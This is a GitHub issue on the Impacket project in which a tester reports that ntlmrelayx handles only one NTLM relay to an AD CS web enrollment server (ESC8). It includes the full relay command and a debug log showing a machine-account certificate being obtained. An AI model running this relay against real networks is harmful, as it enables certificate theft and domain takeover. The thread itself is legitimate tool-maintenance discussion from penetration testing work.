Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Ntlmrelayx can't handle multiple relays to the same AD CS server #1624

Closed
TheLiimbo opened this issue Sep 29, 2023 · 2 comments
Closed

Ntlmrelayx can't handle multiple relays to the same AD CS server #1624

TheLiimbo opened this issue Sep 29, 2023 · 2 comments
Labels
enhancement Implemented features can be improved or revised

Comments

@TheLiimbo
Copy link

TheLiimbo commented Sep 29, 2023

Hello all,

I've recently been on a test where I've been trying to relay multiple different connections to the same AD CS HTTP server, to exploit ESC8. The problem is, with the current implementation it doesn't seem to work nicely, and dies after one success. For instance, if I'm trying to coerce different machines in the network I have to kill the server and restart it every time I test a new target. Another example from my current test is that there are multiple scripts running daily as different users at the same time, each one of which reaches out to my relay. I can capture the first one every time, but not the rest. I'm assuming this is because it's trying to treat it as if the endpoint is an SMB server, or something that can handle only one connection. Example:

ntlmrelayx.py -t http://ADCSSERVER/certsrv/en-US/certfnsh.asp --template DomainController -smb2support --adcs -ts --no-wcf-server --no-http-server --no-raw-server -debug

Impacket v0.11.0 - Copyright 2023 Fortra

[2023-09-29 12:23:05] [+] Impacket Library Installation Path: /home/venv/lib/python3.10/site-packages/impacket
[2023-09-29 12:23:05] [*] Protocol Client SMTP loaded..
[2023-09-29 12:23:05] [*] Protocol Client HTTP loaded..
[2023-09-29 12:23:05] [*] Protocol Client HTTPS loaded..
[2023-09-29 12:23:05] [*] Protocol Client MSSQL loaded..
[2023-09-29 12:23:05] [*] Protocol Client LDAP loaded..
[2023-09-29 12:23:05] [*] Protocol Client LDAPS loaded..
[2023-09-29 12:23:05] [*] Protocol Client RPC loaded..
[2023-09-29 12:23:05] [*] Protocol Client DCSYNC loaded..
[2023-09-29 12:23:05] [*] Protocol Client SMB loaded..
[2023-09-29 12:23:05] [*] Protocol Client IMAPS loaded..
[2023-09-29 12:23:05] [*] Protocol Client IMAP loaded..
[2023-09-29 12:23:05] [+] Protocol Attack DCSYNC loaded..
[2023-09-29 12:23:05] [+] Protocol Attack IMAP loaded..
[2023-09-29 12:23:05] [+] Protocol Attack IMAPS loaded..
[2023-09-29 12:23:05] [+] Protocol Attack HTTP loaded..
[2023-09-29 12:23:05] [+] Protocol Attack HTTPS loaded..
[2023-09-29 12:23:05] [+] Protocol Attack SMB loaded..
[2023-09-29 12:23:05] [+] Protocol Attack RPC loaded..
[2023-09-29 12:23:05] [+] Protocol Attack MSSQL loaded..
[2023-09-29 12:23:05] [+] Protocol Attack LDAP loaded..
[2023-09-29 12:23:05] [+] Protocol Attack LDAPS loaded..
[2023-09-29 12:23:05] [*] Running in relay mode to single host
[2023-09-29 12:23:05] [*] Setting up SMB Server

[2023-09-29 12:23:05] [*] Servers started, waiting for connections
[2023-09-29 12:25:03] [*] SMBD-Thread-2 (process_request_thread): Received connection from 10.1.1.1, attacking target http://ADCSSERVER
[2023-09-29 12:25:04] [*] HTTP server returned error code 200, treating as a successful login
[2023-09-29 12:25:04] [*] Authenticating against http://ADCSSERVER as DOMAIN/MACHINEACCOUNT$ SUCCEED
[2023-09-29 12:25:04] [+] No more targets
[2023-09-29 12:25:04] [*] SMBD-Thread-4 (process_request_thread): Connection from 10.1.1.1 controlled, but there are no more targets left!
[2023-09-29 12:25:04] [+] No more targets
[2023-09-29 12:25:04] [*] SMBD-Thread-5 (process_request_thread): Connection from 10.1.1.1 controlled, but there are no more targets left!
[2023-09-29 12:25:04] [+] No more targets
[2023-09-29 12:25:04] [*] SMBD-Thread-6 (process_request_thread): Connection from 10.1.1.1 controlled, but there are no more targets left!
[2023-09-29 12:25:04] [+] No more targets
[2023-09-29 12:25:04] [*] SMBD-Thread-7 (process_request_thread): Connection from 10.1.1.1 controlled, but there are no more targets left!
[2023-09-29 12:25:04] [*] Generating CSR...
[2023-09-29 12:25:04] [*] CSR generated!
[2023-09-29 12:25:04] [*] Getting certificate...
[2023-09-29 12:25:04] [*] GOT CERTIFICATE! ID XXXX
[2023-09-29 12:25:04] [*] Base64 certificate of user MACHINEACCOUNT$:

<base64 response, as normal>

[2023-09-29 12:27:17] [+] No more targets
[2023-09-29 12:27:17] [*] SMBD-Thread-8 (process_request_thread): Connection from 10.1.1.2 controlled, but there are no more targets left!

To me, it seems that the AD CS relay attack should be able to handle multiple different connections, since all the attack is doing is requesting a certificate through the web enrollment server, and doesn't actually need to keep any sort of connection open.

I've tried to set it to have a bunch of the same target in a "targets file" as well, hoping to get around it, as well as attempted to alter the code to always point to the same target- but I've not been very successful- and believe that this would be a nice QoL update.

EDIT: as a side note on something I did have to contend with, that might also be a nice QoL update- the endpoints for the AD CS server seem to be hardcoded in as always being "/certsrv/X", but having an option to change that could be useful. In my current test, the endpoints were actually "/certsrv/en-US/X", so the code had to be modified to work

@Althibyani
Copy link

I think this is a common issue in ntlmrelayx.py. Same issue here

#1620

@0xdeaddood 0xdeaddood added the enhancement Implemented features can be improved or revised label Oct 6, 2023
@anadrianmanrique
Copy link
Contributor

this should be fixed in #1439 . please recheck
reopen if needed
thanks!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
enhancement Implemented features can be improved or revised
Projects
None yet
Development

No branches or pull requests

4 participants